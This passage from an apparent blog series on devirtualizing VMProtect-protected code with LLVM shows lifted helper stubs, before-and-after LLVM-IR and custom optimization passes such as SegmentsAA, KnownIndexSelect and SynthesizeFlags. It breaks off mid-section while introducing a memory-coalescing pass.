  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR, rptr vsp,
  rptr vip, VirtualRegister *__restrict__ vmregs,
  size_t *__restrict__ slots) {

  PUSH_REG(vsp, rax);
  PUSH_REG(vsp, rbx);
  POP_VMREG<64, 0>(vsp, vmregs[1]);
  POP_VMREG<64, 0>(vsp, vmregs[0]);
  PUSH_VMREG<64, 0>(vsp, vmregs[0]);
  PUSH_VMREG<64, 0>(vsp, vmregs[1]);
  ADD<uint64_t>(vsp);
  POP_VMREG<64, 0>(vsp, vmregs[2]);
  POP_VMREG<64, 0>(vsp, vmregs[3]);
  PUSH_VMREG<64, 0>(vsp, vmregs[3]);
  POP_REG(vsp, rax);

  return vip;
}

The C++ HelperStub function with calls to the handlers. This only serves as an example, normally the LLVM-IR for this is automatically generated from VM bytecode.

define dso_local i64 @SimpleExample_HelperStub(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR, i64* noalias nonnull align 8 dereferenceable(8) %vsp, i64* noalias nonnull align 8 dereferenceable(8) %vip, %struct.VirtualRegister* noalias %vmregs, i64* noalias %slots) local_unnamed_addr {
entry:
  %rax.addr = alloca i64*, align 8
  %rbx.addr = alloca i64*, align 8
  %rcx.addr = alloca i64*, align 8
  %rdx.addr = alloca i64*, align 8
  %rsi.addr = alloca i64*, align 8
  %rdi.addr = alloca i64*, align 8
  %rbp.addr = alloca i64*, align 8
  %rsp.addr = alloca i64*, align 8
  %r8.addr = alloca i64*, align 8
  %r9.addr = alloca i64*, align 8
  %r10.addr = alloca i64*, align 8
  %r11.addr = alloca i64*, align 8
  %r12.addr = alloca i64*, align 8
  %r13.addr = alloca i64*, align 8
  %r14.addr = alloca i64*, align 8
  %r15.addr = alloca i64*, align 8
  %flags.addr = alloca i64*, align 8
  %KEY_STUB.addr = alloca i64, align 8
  %RET_ADDR.addr = alloca i64, align 8
  %REL_ADDR.addr = alloca i64, align 8
  %vsp.addr = alloca i64*, align 8
  %vip.addr = alloca i64*, align 8
  %vmregs.addr = alloca %struct.VirtualRegister*, align 8
  %slots.addr = alloca i64*, align 8
  %agg.tmp = alloca %struct.VirtualRegister, align 1
  %agg.tmp4 = alloca %struct.VirtualRegister, align 1
  %agg.tmp10 = alloca %struct.VirtualRegister, align 1
  store i64* %rax, i64** %rax.addr, align 8
  store i64* %rbx, i64** %rbx.addr, align 8
  store i64* %rcx, i64** %rcx.addr, align 8
  store i64* %rdx, i64** %rdx.addr, align 8
  store i64* %rsi, i64** %rsi.addr, align 8
  store i64* %rdi, i64** %rdi.addr, align 8
  store i64* %rbp, i64** %rbp.addr, align 8
  store i64* %rsp, i64** %rsp.addr, align 8
  store i64* %r8, i64** %r8.addr, align 8
  store i64* %r9, i64** %r9.addr, align 8
  store i64* %r10, i64** %r10.addr, align 8
  store i64* %r11, i64** %r11.addr, align 8
  store i64* %r12, i64** %r12.addr, align 8
  store i64* %r13, i64** %r13.addr, align 8
  store i64* %r14, i64** %r14.addr, align 8
  store i64* %r15, i64** %r15.addr, align 8
  store i64* %flags, i64** %flags.addr, align 8
  store i64 %KEY_STUB, i64* %KEY_STUB.addr, align 8
  store i64 %RET_ADDR, i64* %RET_ADDR.addr, align 8
  store i64 %REL_ADDR, i64* %REL_ADDR.addr, align 8
  store i64* %vsp, i64** %vsp.addr, align 8
  store i64* %vip, i64** %vip.addr, align 8
  store %struct.VirtualRegister* %vmregs, %struct.VirtualRegister** %vmregs.addr, align 8
  store i64* %slots, i64** %slots.addr, align 8
  %0 = load i64*, i64** %vsp.addr, align 8
  %1 = load i64*, i64** %rax.addr, align 8
  %2 = load i64, i64* %1, align 8
  call void @_Z8PUSH_REGRmm(i64* nonnull align 8 dereferenceable(8) %0, i64 %2)
  %3 = load i64*, i64** %vsp.addr, align 8
  %4 = load i64*, i64** %rbx.addr, align 8
  %5 = load i64, i64* %4, align 8
  call void @_Z8PUSH_REGRmm(i64* nonnull align 8 dereferenceable(8) %3, i64 %5)
  %6 = load i64*, i64** %vsp.addr, align 8
  %7 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %7, i64 1
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %6, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx)
  %8 = load i64*, i64** %vsp.addr, align 8
  %9 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx1 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %9, i64 0
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %8, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx1)
  %10 = load i64*, i64** %vsp.addr, align 8
  %11 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx2 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %11, i64 0
  %12 = bitcast %struct.VirtualRegister* %agg.tmp to i8*
  %13 = bitcast %struct.VirtualRegister* %arrayidx2 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 1 %12, i8* align 1 %13, i64 8, i1 false)
  %coerce.dive = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %agg.tmp, i32 0, i32 0
  %coerce.dive3 = getelementptr inbounds %union.anon, %union.anon* %coerce.dive, i32 0, i32 0
  %14 = load i64, i64* %coerce.dive3, align 1
  call void @_Z10PUSH_VMREGILm64ELm0EEvRm15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %10, i64 %14)
  %15 = load i64*, i64** %vsp.addr, align 8
  %16 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx5 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %16, i64 1
  %17 = bitcast %struct.VirtualRegister* %agg.tmp4 to i8*
  %18 = bitcast %struct.VirtualRegister* %arrayidx5 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 1 %17, i8* align 1 %18, i64 8, i1 false)
  %coerce.dive6 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %agg.tmp4, i32 0, i32 0
  %coerce.dive7 = getelementptr inbounds %union.anon, %union.anon* %coerce.dive6, i32 0, i32 0
  %19 = load i64, i64* %coerce.dive7, align 1
  call void @_Z10PUSH_VMREGILm64ELm0EEvRm15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %15, i64 %19)
  %20 = load i64*, i64** %vsp.addr, align 8
  call void @_Z3ADDIyEvRm(i64* nonnull align 8 dereferenceable(8) %20)
  %21 = load i64*, i64** %vsp.addr, align 8
  %22 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx8 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %22, i64 2
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %21, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx8)
  %23 = load i64*, i64** %vsp.addr, align 8
  %24 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx9 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %24, i64 3
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %23, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx9)
  %25 = load i64*, i64** %vsp.addr, align 8
  %26 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx11 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %26, i64 3
  %27 = bitcast %struct.VirtualRegister* %agg.tmp10 to i8*
  %28 = bitcast %struct.VirtualRegister* %arrayidx11 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 1 %27, i8* align 1 %28, i64 8, i1 false)
  %coerce.dive12 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %agg.tmp10, i32 0, i32 0
  %coerce.dive13 = getelementptr inbounds %union.anon, %union.anon* %coerce.dive12, i32 0, i32 0
  %29 = load i64, i64* %coerce.dive13, align 1
  call void @_Z10PUSH_VMREGILm64ELm0EEvRm15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %25, i64 %29)
  %30 = load i64*, i64** %vsp.addr, align 8
  %31 = load i64*, i64** %rax.addr, align 8
  call void @_Z7POP_REGRmS_(i64* nonnull align 8 dereferenceable(8) %30, i64* nonnull align 8 dereferenceable(8) %31)
  %32 = load i64*, i64** %vip.addr, align 8
  %33 = load i64, i64* %32, align 8
  ret i64 %33
}

The LLVM-IR compiled from the previous C++ HelperStub function.

define dso_local i64 @SimpleExample_HelperStub(i64* noalias nocapture nonnull align 8 dereferenceable(8) %rax, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %rbx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rcx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rsi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rbp, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rsp, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r8, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r9, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r10, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r11, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r12, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r13, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r14, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r15, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR, i64* noalias nonnull align 8 dereferenceable(8) %vsp, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %vip, %struct.VirtualRegister* noalias nocapture %vmregs, i64* noalias nocapture readnone %slots) local_unnamed_addr {
entry:
  %0 = load i64, i64* %rax, align 8
  %1 = load i64, i64* %vsp, align 8
  %sub.i.i = add i64 %1, -8
  %arrayidx.i.i = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %sub.i.i
  %value.addr.0.arrayidx.sroa_cast.i.i = bitcast i8* %arrayidx.i.i to i64*
  %2 = load i64, i64* %rbx, align 8
  %sub.i.i66 = add i64 %1, -16
  %arrayidx.i.i67 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %sub.i.i66
  %value.addr.0.arrayidx.sroa_cast.i.i68 = bitcast i8* %arrayidx.i.i67 to i64*
  %qword.i62 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 1, i32 0, i32 0
  store i64 %2, i64* %qword.i62, align 1
  %3 = load i64, i64* @__undef, align 8
  %qword.i55 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 0, i32 0, i32 0
  store i64 %0, i64* %qword.i55, align 1
  %add.i32.i = add i64 %2, %0
  %cmp.i.i.i.i = icmp ult i64 %add.i32.i, %2
  %cmp1.i.i.i.i = icmp ult i64 %add.i32.i, %0
  %4 = or i1 %cmp.i.i.i.i, %cmp1.i.i.i.i
  %conv.i.i.i.i = trunc i64 %add.i32.i to i32
  %conv.i.i.i.i.i = and i32 %conv.i.i.i.i, 255
  %5 = tail call i32 @llvm.ctpop.i32(i32 %conv.i.i.i.i.i)
  %xor.i.i28.i.i = xor i64 %2, %0
  %xor1.i.i.i.i = xor i64 %xor.i.i28.i.i, %add.i32.i
  %and.i.i.i.i = and i64 %xor1.i.i.i.i, 16
  %cmp.i.i27.i.i = icmp eq i64 %add.i32.i, 0
  %shr.i.i.i.i = lshr i64 %2, 63
  %shr1.i.i.i.i = lshr i64 %0, 63
  %shr2.i.i.i.i = lshr i64 %add.i32.i, 63
  %xor.i.i.i.i = xor i64 %shr2.i.i.i.i, %shr.i.i.i.i
  %xor3.i.i.i.i = xor i64 %shr2.i.i.i.i, %shr1.i.i.i.i
  %add.i.i.i.i = add nuw nsw i64 %xor.i.i.i.i, %xor3.i.i.i.i
  %cmp.i.i25.i.i = icmp eq i64 %add.i.i.i.i, 2
  %conv.i.i.i = zext i1 %4 to i64
  %6 = shl nuw nsw i32 %5, 2
  %7 = and i32 %6, 4
  %8 = xor i32 %7, 4
  %9 = zext i32 %8 to i64
  %shl22.i.i.i = select i1 %cmp.i.i27.i.i, i64 64, i64 0
  %10 = lshr i64 %add.i32.i, 56
  %11 = and i64 %10, 128
  %shl34.i.i.i = select i1 %cmp.i.i25.i.i, i64 2048, i64 0
  %or6.i.i.i = or i64 %11, %shl22.i.i.i
  %and13.i.i.i = or i64 %or6.i.i.i, %and.i.i.i.i
  %or17.i.i.i = or i64 %and13.i.i.i, %conv.i.i.i
  %and25.i.i.i = or i64 %or17.i.i.i, %shl34.i.i.i
  %or29.i.i.i = or i64 %and25.i.i.i, %9
  %qword.i36 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 2, i32 0, i32 0
  store i64 %or29.i.i.i, i64* %qword.i36, align 1
  store i64 %3, i64* %value.addr.0.arrayidx.sroa_cast.i.i68, align 1
  %qword.i = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 3, i32 0, i32 0
  store i64 %add.i32.i, i64* %qword.i, align 1
  store i64 %3, i64* %value.addr.0.arrayidx.sroa_cast.i.i, align 1
  store i64 %add.i32.i, i64* %rax, align 8
  %12 = load i64, i64* %vip, align 8
  ret i64 %12
}

The LLVM-IR of the HelperStub function with inlined and optimized calls to the handlers

The last snippet is representing all the semantic computations related with a VmBlock, as described in the high level overview. Although, if the code we lifted is capturing the whole semantics related with a VmStub, we can wrap the HelperStub function with the HelperFunction function, which enforces the liveness properties described in the Liveness and aliasing information section, enabling us to obtain only the computations updating the host execution context:

extern "C" size_t SimpleExample_HelperFunction(
    rptr rax, rptr rbx, rptr rcx,
    rptr rdx, rptr rsi, rptr rdi,
    rptr rbp, rptr rsp, rptr r8,
    rptr r9, rptr r10, rptr r11,
    rptr r12, rptr r13, rptr r14,
    rptr r15, rptr flags, size_t KEY_STUB,
    size_t RET_ADDR, size_t REL_ADDR) {
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[30] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = SimpleExample_HelperStub(
    rax, rbx, rcx, rdx, rsi, rdi,
    rbp, rsp, r8, r9, r10, r11,
    r12, r13, r14, r15, flags,
    KEY_STUB, RET_ADDR, REL_ADDR,
    vsp, vip, vmregs, slots);
  // Return the next address(es)
  return vip;
}

The C++ HelperFunction function with the call to the HelperStub function and the relevant stack frame allocations.

define dso_local i64 @SimpleExample_HelperFunction(i64* noalias nocapture nonnull align 8 dereferenceable(8) %rax, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %rbx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rcx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rsi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rbp, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %rsp, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r8, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r9, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r10, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r11, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r12, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r13, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r14, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r15, i64* noalias nocapture nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) local_unnamed_addr {
entry:
  %0 = load i64, i64* %rax, align 8
  %1 = load i64, i64* %rbx, align 8
  %add.i32.i.i = add i64 %1, %0
  store i64 %add.i32.i.i, i64* %rax, align 8
  ret i64 0
}

The LLVM-IR HelperFunction function with fully optimized code.

It can be seen that the example is just pushing the values of the registers rax and rbx, loading them in vmregs[0] and vmregs[1] respectively, pushing the VmRegisters on the stack, adding them together, popping the updated flags in vmregs[2], popping the addition’s result to vmregs[3] and finally pushing vmregs[3] on the stack to be popped in the rax register at the end. The liveness of the values of the VmRegisters ends with the end of the function, hence the updated flags saved in vmregs[2] won’t be reflected on the host execution context. Looking at the final snippet we can see that the semantics of the code have been successfully obtained.

What’s next?

In Part 2 we’ll put the described structures and helpers to good use, digging into the details of the virtualized CFG exploration and introducing the basics of the LLVM optimization pipeline.

Tickling VMProtect with LLVM: Part 3

8 September 2021 at 23:00

This post will introduce 7 custom passes that, once added to the optimization pipeline, will make the overall LLVM-IR output more readable. Some words will be spent on the unsupported instructions lifting and recompilation topics. Finally, the output of 6 devirtualized functions will be shown.

Custom passes

This section will give an overview of some custom passes meant to:

  • Solve VMProtect specific optimization problems;
  • Solve some limitations of existing LLVM passes, but that won’t meet the same quality standard of an official LLVM pass.

SegmentsAA

This pass falls under the category of the VMProtect specific optimization problems and is probably the most delicate of the section, as it may be feeding LLVM with unsafe assumptions. The aliasing information described in the Liveness and aliasing information section will finally come in handy. In fact, the goal of the pass is to identify the type of two pointers and determine if they can be deemed as not aliasing with one another.

With the structures defined in the previous sections, LLVM is already able to infer that two pointers derived from the following sources don’t alias with one another:

  • general purpose registers
  • VmRegisters
  • VmPassingSlots
  • GS zero-sized array
  • FS zero-sized array
  • RAM zero-sized array (with constant index)
  • RAM zero-sized array (with symbolic index)

Additionally LLVM can also discern between pointers with RAM base using a simple symbolic index. For example an access to [rsp - 0x10] (local stack slot) will be considered as NoAlias when compared with an access to [rsp + 0x10] (incoming stack argument).

But LLVM’s alias analysis passes fall short when handling pointers using as base the RAM array and employing a more convoluted symbolic index, and the reason for the shortcoming is entirely related to the lack of type and context information that got lost during the compilation to binary.

The pass is inspired by existing implementations (1, 2, 3) that are basing their checks on the identification of pointers belonging to different segments and address spaces.

Slicing the symbolic index used in a RAM array access we can discern with high confidence between the following additional NoAlias memory accesses:

  • indirect access: if the access is a stack argument ([rsp] or [rsp + positive_constant_offset + symbolic_offset]), a dereferenced general purpose register ([rax]) or a nested dereference (val1 = [rax], val2 = [val1]); identified as TyIND in the code;
  • local stack slot: if the access is of the form [rsp - positive_constant_offset + symbolic_offset]; identified as TySS in the code;
  • local stack array: if the access if of the form [rsp - positive_constant_offset + phi_index]; identified as TyARR in the code.

If the pointer type cannot be reliably detected, an unknown type (identified as TyUNK in the code) is being used, and the comparison between the pointers is automatically skipped. If the pass cannot return a NoAlias result, the query is passed back to the default alias analysis pipeline.

One could argue that the pass is not really needed, as it is unlikely that the propagation of the sensitive information we need to successfully explore the virtualized CFG is hindered by aliasing issues. In fact, the computation of a conditional branch at the end of a VmBlock is guaranteed not to be hindered by a symbolic memory store happening before the jump VmHandler accesses the branch destination. But there are some cases where VMProtect pushes the address of the next VmStub in one of the first VmBlocks, doing memory stores in between and accessing the pushed value only in one or more VmExits. That could be a case where discerning between a local stack slot and an indirect access enables the propagation of the pushed address.

Irregardless of the aforementioned issue, that can be solved with some ad-hoc store-to-load detection logic, playing around with the alias analysis information that can be fed to LLVM could make the devirtualized code more readable. We have to keep in mind that there may be edge cases where the original code is breaking our assumptions, so having at least a vague idea of the involved pointers accessed at runtime could give us more confidence or force us to err on the safe side, relying solely on the built-in LLVM alias analysis passes.

The assembly snippet shown below has been devirtualized with and without adding the SegmentsAA pass to the pipeline. If we are sure that at runtime, before the push rax instruction, rcx doesn’t contain the value rsp - 8 (extremely unexpected on benign code), we can safely enable the SegmentsAA pass and obtain a cleaner output.

start:
  push rax
  mov qword ptr [rsp], 1
  mov qword ptr [rcx], 2
  pop rax

The assembly code writing to two possibly aliasing memory slots

define dso_local i64 @F_0x14000101f(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #2 {
  %1 = load i64, i64* %rcx, align 8, !alias.scope !22, !noalias !27
  %2 = inttoptr i64 %1 to i64*
  store i64 2, i64* %2, align 1, !noalias !65
  store i64 1, i64* %rax, align 8, !tbaa !4, !alias.scope !66, !noalias !67
  ret i64 5368713278
}

The devirtualized code with the SegmentsAA pass added to the pipeline, with the assumption that rcx differs from rsp - 8

define dso_local i64 @F_0x14000101f(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #2 {
  %1 = load i64, i64* %rsp, align 8, !tbaa !4, !alias.scope !22, !noalias !27
  %2 = add i64 %1, -8
  %3 = load i64, i64* %rcx, align 8, !alias.scope !65, !noalias !66
  %4 = inttoptr i64 %2 to i64*
  store i64 1, i64* %4, align 1, !noalias !67
  %5 = inttoptr i64 %3 to i64*
  store i64 2, i64* %5, align 1, !noalias !67
  %6 = load i64, i64* %4, align 1, !noalias !67
  store i64 %6, i64* %rax, align 8, !tbaa !4, !alias.scope !68, !noalias !69
  ret i64 5368713278
}

The devirtualized code without the SegmentsAA pass added to the pipeline and therefore no assumptions fed to LLVM

Alias analysis is a complex topic, and experience thought me that most of the propagation issues happening while using LLVM to deobfuscate some code are related to the LLVM’s alias analysis passes being hinder by some pointer computation. Therefore, having the capability to feed LLVM with context-aware information could be the only way to handle certain types of obfuscation. Beware that other tools you are used to are most likely doing similar “safe” assumptions under the hood (e.g. concolic execution tools using the concrete pointer to answer the aliasing queries).

The takeaway from this section is that, if needed, you can define your own alias analysis callback pass to be integrated in the optimization pipeline in such a way that pre-existing passes can make use of the refined aliasing query results. This is similar to updating IDA’s stack variables with proper type definitions to improve the propagation results.

KnownIndexSelect

This pass falls under the category of the VMProtect specific optimization problems. In fact, whoever looked into VMProtect 3.0.9 knows that the following trick, reimplemented as high level C code for simplicity, is being internally used to select between two branches of a conditional jump.

uint64_t ConditionalBranchLogic(uint64_t RFLAGS) {
  // Extracting the ZF flag bit
  uint64_t ConditionBit = (RFLAGS & 0x40) >> 6;
  // Writing the jump destinations
  uint64_t Stack[2] = { 0 };
  Stack[0] = 5369966919;
  Stack[1] = 5369966790;
  // Selecting the correct jump destination
  return Stack[ConditionBit];
}

What is really happening at the low level is that the branch destinations are written to adjacent stack slots and then a conditional load, controlled by the previously computed flags, is going to select between one slot or the other to fetch the right jump destination.

LLVM doesn’t automatically see through the conditional load, but it is providing us with all the needed information to write such an optimization ourselves. In fact, the ValueTracking analysis exposes the computeKnownBits function that we can use to determine if the index used in a getelementptr instruction is bound to have just two values.

At this point we can generate two separated load instructions accessing the stack slots with the inferred indices and feed them to a select instruction controlled by the index itself. At the next store-to-load propagation, LLVM will happily identify the matching store and load instructions, propagating the constants representing the conditional branch destinations and generating a nice select instruction with second and third constant operands.

; Matched pattern
%i0 = add i64 %base, %index
%i1 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %i0
%i2 = bitcast i8* %i1 to i64*
%i3 = load i64, i64* %i2, align 1

; Exploded form
%51 = add i64 %base, 0
%52 = add i64 %base, 8
%53 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
%54 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %52
%55 = bitcast i8* %53 to i64*
%56 = bitcast i8* %54 to i64*
%57 = load i64, i64* %55, align 8
%58 = load i64, i64* %56, align 8
%59 = icmp eq i64 %index, 0
%60 = select i1 %59, i64 %57, i64 %58

; Simplified select instruction
%59 = icmp eq i64 %index, 0
%60 = select i1 %59, i64 5369966919, i64 5369966790

The snippet above shows the matched pattern, its exploded form suitable for the LLVM propagation and its final optimized shape. In this case the ValueTracking analysis provided the values 0 and 8 as the only feasible ones for the %index value.

A brief discussion about this pass can be found in this chain of messages in the LLVM mailing list.

SynthesizeFlags

This pass falls in between the categories of the VMProtect specific optimization problems and LLVM optimization limitations. In fact, this pass is based on the enumerative synthesis logic implemented by Souper, with some minor tweaks to make it more performant for our use-case.

This pass exists because I’m lazy and the fewer ad-hoc patterns I write, the happier I am. The patterns we are talking about are the ones generated by the flag manipulations that VMProtect does when computing the condition for a conditional branch. LLVM already does a good job with simplifying part of the patterns, but to obtain mint-like results we absolutely need to help it a bit.

There’s not much to say about this pass, it is basically invoking Souper’s enumerative synthesis with a selected set of components (Inst::CtPop, Inst::Eq, Inst::Ne, Inst::Ult, Inst::Slt, Inst::Ule, Inst::Sle, Inst::SAddO, Inst::UAddO, Inst::SSubO, Inst::USubO, Inst::SMulO, Inst::UMulO), requiring the synthesis of a single instruction, enabling the data-flow pruning option and bounding the LHS candidates to a maximum of 50. Additionally the pass is executing the synthesis only on the i1 conditions used by the select and br instructions.

This Godbolt page shows the devirtualized LLVM-IR output obtained appending the SynthesizeFlags pass to the pipeline and the resulting assembly with the properly recompiled conditional jumps. The original assembly code can be seen below. It’s a dummy sequence of instructions where the key piece is the comparison between the rax and rbx registers that drives the conditional branch jcc.

start:
  cmp rax, rbx
  jcc label
  and rcx, rdx
  mov qword ptr ds:[rcx], 1
  jmp exit
label:
  xor rcx, rdx
  add qword ptr ds:[rcx], 2
exit:

MemoryCoalescing

This pass falls under the category of the generic LLVM optimization passes that couldn’t possibly be included in the mainline framework because they wouldn’t match the quality criteria of a stable pass. Although the transformations done by this pass are applicable to generic LLVM-IR code, even if the handled cases are most likely to be found in obfuscated code.

Passes like DSE already attempt to handle the case where a store instruction is partially or completely overlapping with other store instructions. Although the more convoluted case of multiple stores contributing to the value of a single memory slot are somehow only partially handled.

This pass is focusing on the handling of the case illustrated in the following snippet, where multiple smaller stores contribute to the creation of a bigger value subsequently accessed by a single load instruction.

